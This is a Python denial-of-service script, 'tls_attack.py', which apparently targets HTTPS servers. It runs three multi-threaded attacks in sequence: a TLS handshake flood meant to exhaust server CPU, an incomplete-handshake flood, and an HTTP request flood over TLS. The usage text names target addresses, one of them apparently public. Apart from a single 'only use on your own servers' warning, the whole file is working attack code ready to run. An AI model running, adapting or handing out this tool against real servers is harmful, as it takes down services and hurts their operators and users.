#!/usr/bin/env python3 """ TLS/SSL Handshake Attack Simulator - Targets HTTPS/SSL handshake CPU exhaustion Usage: python3 tls_attack.py [port] [duration] [threads] """ import ssl import socket import threading import time import sys import random from concurrent.futures import ThreadPoolExecutor class TLSHandshakeAttack: def __init__(self, target_ip, target_port=443): self.target_ip = target_ip self.target_port = target_port self.attempts = 0 self.successful_handshakes = 0 self.failed_handshakes = 0 self.start_time = None # Various TLS versions and ciphers to try self.tls_versions = [ ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, ] self.cipher_suites = [ 'ECDHE-RSA-AES256-GCM-SHA384', 'ECDHE-RSA-AES128-GCM-SHA256', 'AES256-GCM-SHA384', 'AES128-GCM-SHA256', 'ECDHE-RSA-AES256-SHA384', 'ECDHE-RSA-AES128-SHA256', 'AES256-SHA256', 'AES128-SHA256', 'ECDHE-RSA-AES256-SHA', 'ECDHE-RSA-AES128-SHA', 'AES256-SHA', 'AES128-SHA', ] def create_ssl_context(self, version=None, cipher=None): """Create SSL context with specific version and cipher""" context = ssl.create_default_context() if version: context = ssl.SSLContext(version) context.check_hostname = False context.verify_mode = ssl.CERT_NONE if cipher and hasattr(context, 'set_ciphers'): try: context.set_ciphers(cipher) except: pass return context def tls_handshake_attack(self, duration=30, max_threads=200): """Heavy TLS handshake attack - targets server CPU""" print(f"๐Ÿ’€ TLS HANDSHAKE CPU ATTACK") print(f"๐ŸŽฏ Target: {self.target_ip}:{self.target_port}") print(f"โฐ Duration: {duration}s | ๐Ÿงต Threads: {max_threads}") print("=" * 60) self.attempts = 0 self.successful_handshakes = 0 self.failed_handshakes = 0 self.start_time = time.time() self.stop_flag = threading.Event() def tls_attacker(thread_id): while not self.stop_flag.is_set(): try: # Create raw socket sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) # Connect to target sock.connect((self.target_ip, self.target_port)) # Wrap with SSL - this is where CPU load happens ssl_context = self.create_ssl_context( random.choice(self.tls_versions), random.choice(self.cipher_suites) ) ssl_sock = ssl_context.wrap_socket( sock, server_hostname=self.target_ip, do_handshake_on_connect=True ) # Handshake successful self.successful_handshakes += 1 # Keep connection open briefly to consume resources time.sleep(random.uniform(0.1, 0.5)) # Close connection ssl_sock.close() except ssl.SSLError as e: # SSL handshake failed - but still consumed server CPU! self.failed_handshakes += 1 except (socket.timeout, ConnectionRefusedError, ConnectionResetError) as e: self.failed_handshakes += 1 except Exception as e: self.failed_handshakes += 1 finally: self.attempts += 1 # Start attack threads threads = [] for i in range(max_threads): t = threading.Thread(target=tls_attacker, args=(i,)) t.daemon = True threads.append(t) t.start() # Progress monitoring while time.time() - self.start_time < duration: elapsed = time.time() - self.start_time total_handshakes = self.successful_handshakes + self.failed_handshakes handshakes_per_sec = total_handshakes / elapsed if elapsed > 0 else 0 print(f"\rโฐ {elapsed:.1f}s | ๐Ÿค {total_handshakes} handshakes | ๐Ÿ“ˆ {handshakes_per_sec:.1f}/sec | โœ… {self.successful_handshakes} success | โŒ {self.failed_handshakes} failed", end="") time.sleep(0.5) self.stop_flag.set() time.sleep(2) self.print_final_stats() def incomplete_handshake_attack(self, duration=25, max_threads=150): """Attack with incomplete TLS handshakes - maximum CPU load""" print(f"\n๐Ÿšซ INCOMPLETE TLS HANDSHAKE ATTACK") print(f"๐ŸŽฏ Target: {self.target_ip}:{self.target_port}") print(f"โฐ Duration: {duration}s | ๐Ÿงต Threads: {max_threads}") print("=" * 60) self.attempts = 0 self.start_time = time.time() self.stop_flag = threading.Event() def incomplete_attacker(thread_id): while not self.stop_flag.is_set(): try: # Create socket and connect sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(3) sock.connect((self.target_ip, self.target_port)) # Start SSL but don't complete handshake ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE ssl_sock = ssl_context.wrap_socket( sock, server_hostname=self.target_ip, do_handshake_on_connect=False # Don't complete handshake ) # Send some data but don't complete handshake ssl_sock.send(b'GET / HTTP/1.1\r\n') time.sleep(0.2) # Close without proper handshake completion ssl_sock.close() except: pass # Expected to fail finally: self.attempts += 1 # Start attackers threads = [] for i in range(max_threads): t = threading.Thread(target=incomplete_attacker, args=(i,)) t.daemon = True threads.append(t) t.start() # Monitor while time.time() - self.start_time < duration: elapsed = time.time() - self.start_time attempts_per_sec = self.attempts / elapsed if elapsed > 0 else 0 print(f"\rโฐ {elapsed:.1f}s | ๐Ÿ’ฃ {self.attempts} incomplete handshakes | ๐Ÿ“ˆ {attempts_per_sec:.1f}/sec", end="") time.sleep(0.5) self.stop_flag.set() time.sleep(1) self.print_simple_stats() def http_flood_with_tls(self, duration=20, max_threads=100): """HTTP flood over TLS - application layer attack""" print(f"\n๐ŸŒŠ HTTP FLOOD OVER TLS") print(f"๐ŸŽฏ Target: {self.target_ip}:{self.target_port}") print(f"โฐ Duration: {duration}s | ๐Ÿงต Threads: {max_threads}") print("=" * 60) self.attempts = 0 self.successful_requests = 0 self.start_time = time.time() self.stop_flag = threading.Event() http_requests = [ "GET / HTTP/1.1\r\nHost: {}\r\n\r\n", "GET /index.html HTTP/1.1\r\nHost: {}\r\n\r\n", "GET /wp-admin HTTP/1.1\r\nHost: {}\r\n\r\n", "POST /login HTTP/1.1\r\nHost: {}\r\nContent-Length: 0\r\n\r\n", ] def http_attacker(thread_id): while not self.stop_flag.is_set(): try: # Create SSL connection context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE with socket.create_connection((self.target_ip, self.target_port), timeout=5) as sock: with context.wrap_socket(sock, server_hostname=self.target_ip) as ssock: # Send HTTP request request = random.choice(http_requests).format(self.target_ip) ssock.send(request.encode()) # Read partial response to consume server resources response = ssock.recv(1024) self.successful_requests += 1 except: pass finally: self.attempts += 1 # Start HTTP flood threads = [] for i in range(max_threads): t = threading.Thread(target=http_attacker, args=(i,)) t.daemon = True threads.append(t) t.start() # Monitor while time.time() - self.start_time < duration: elapsed = time.time() - self.start_time requests_per_sec = self.attempts / elapsed if elapsed > 0 else 0 print(f"\rโฐ {elapsed:.1f}s | ๐ŸŒŠ {self.attempts} HTTP requests | ๐Ÿ“ˆ {requests_per_sec:.1f}/sec | โœ… {self.successful_requests} success", end="") time.sleep(0.5) self.stop_flag.set() time.sleep(1) self.print_http_stats() def print_final_stats(self): """Print final TLS attack statistics""" total_time = time.time() - self.start_time total_handshakes = self.successful_handshakes + self.failed_handshakes handshakes_per_sec = total_handshakes / total_time if total_time > 0 else 0 success_rate = (self.successful_handshakes / total_handshakes * 100) if total_handshakes > 0 else 0 print(f"\n" + "=" * 60) print(f"๐ŸŽฏ TLS ATTACK COMPLETE") print(f"โฑ๏ธ Total Time: {total_time:.1f}s") print(f"๐Ÿค Total Handshakes: {total_handshakes}") print(f"โœ… Successful: {self.successful_handshakes}") print(f"โŒ Failed: {self.failed_handshakes}") print(f"๐Ÿ“ˆ Handshakes/Second: {handshakes_per_sec:.1f}") print(f"๐Ÿ“Š Success Rate: {success_rate:.2f}%") print(f"๐ŸŽฏ Target: {self.target_ip}:{self.target_port}") print("=" * 60) def print_simple_stats(self): """Print simple stats for incomplete handshakes""" total_time = time.time() - self.start_time attempts_per_sec = self.attempts / total_time if total_time > 0 else 0 print(f"\n๐ŸŽฏ INCOMPLETE HANDSHAKE ATTACK COMPLETE") print(f"โฑ๏ธ Time: {total_time:.1f}s") print(f"๐Ÿ’ฃ Attempts: {self.attempts}") print(f"๐Ÿ“ˆ Attempts/Second: {attempts_per_sec:.1f}") def print_http_stats(self): """Print HTTP flood statistics""" total_time = time.time() - self.start_time requests_per_sec = self.attempts / total_time if total_time > 0 else 0 success_rate = (self.successful_requests / self.attempts * 100) if self.attempts > 0 else 0 print(f"\n๐ŸŽฏ HTTP FLOOD COMPLETE") print(f"โฑ๏ธ Time: {total_time:.1f}s") print(f"๐ŸŒŠ Requests: {self.attempts}") print(f"โœ… Successful: {self.successful_requests}") print(f"๐Ÿ“ˆ Requests/Second: {requests_per_sec:.1f}") print(f"๐Ÿ“Š Success Rate: {success_rate:.2f}%") def main(): if len(sys.argv) < 2: print("๐Ÿ’€ TLS/SSL HANDSHAKE ATTACK SIMULATOR") print("Usage: python3 tls_attack.py [port] [duration] [threads]") print("\nExamples:") print(" python3 tls_attack.py 192.168.1.100") print(" python3 tls_attack.py 192.168.1.100 443 30 200") print(" python3 tls_attack.py 10.0.0.5 80 60 150") # Yes, port 80 can have TLS too! print(" python3 tls_attack.py 43.98.161.66 443 45 250") sys.exit(1) # Parse command line arguments target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 443 duration = int(sys.argv[3]) if len(sys.argv) > 3 else 30 threads = int(sys.argv[4]) if len(sys.argv) > 4 else 200 print("๐Ÿ’€ STARTING TLS/SSL HANDSHAKE ATTACK") print("โš ๏ธ WARNING: Only use on your own servers!") print("=" * 60) attacker = TLSHandshakeAttack(target_ip, target_port) try: # Run TLS handshake attack (most CPU intensive) attacker.tls_handshake_attack(duration=duration, max_threads=threads) # Run incomplete handshake attack (very heavy on server CPU) attacker.incomplete_handshake_attack(duration=duration//2, max_threads=threads) # Run HTTP flood over TLS attacker.http_flood_with_tls(duration=duration//2, max_threads=threads//2) except KeyboardInterrupt: print("\n\nโน๏ธ Attack interrupted by user") except Exception as e: print(f"\nโŒ Error: {e}") if __name__ == "__main__": main()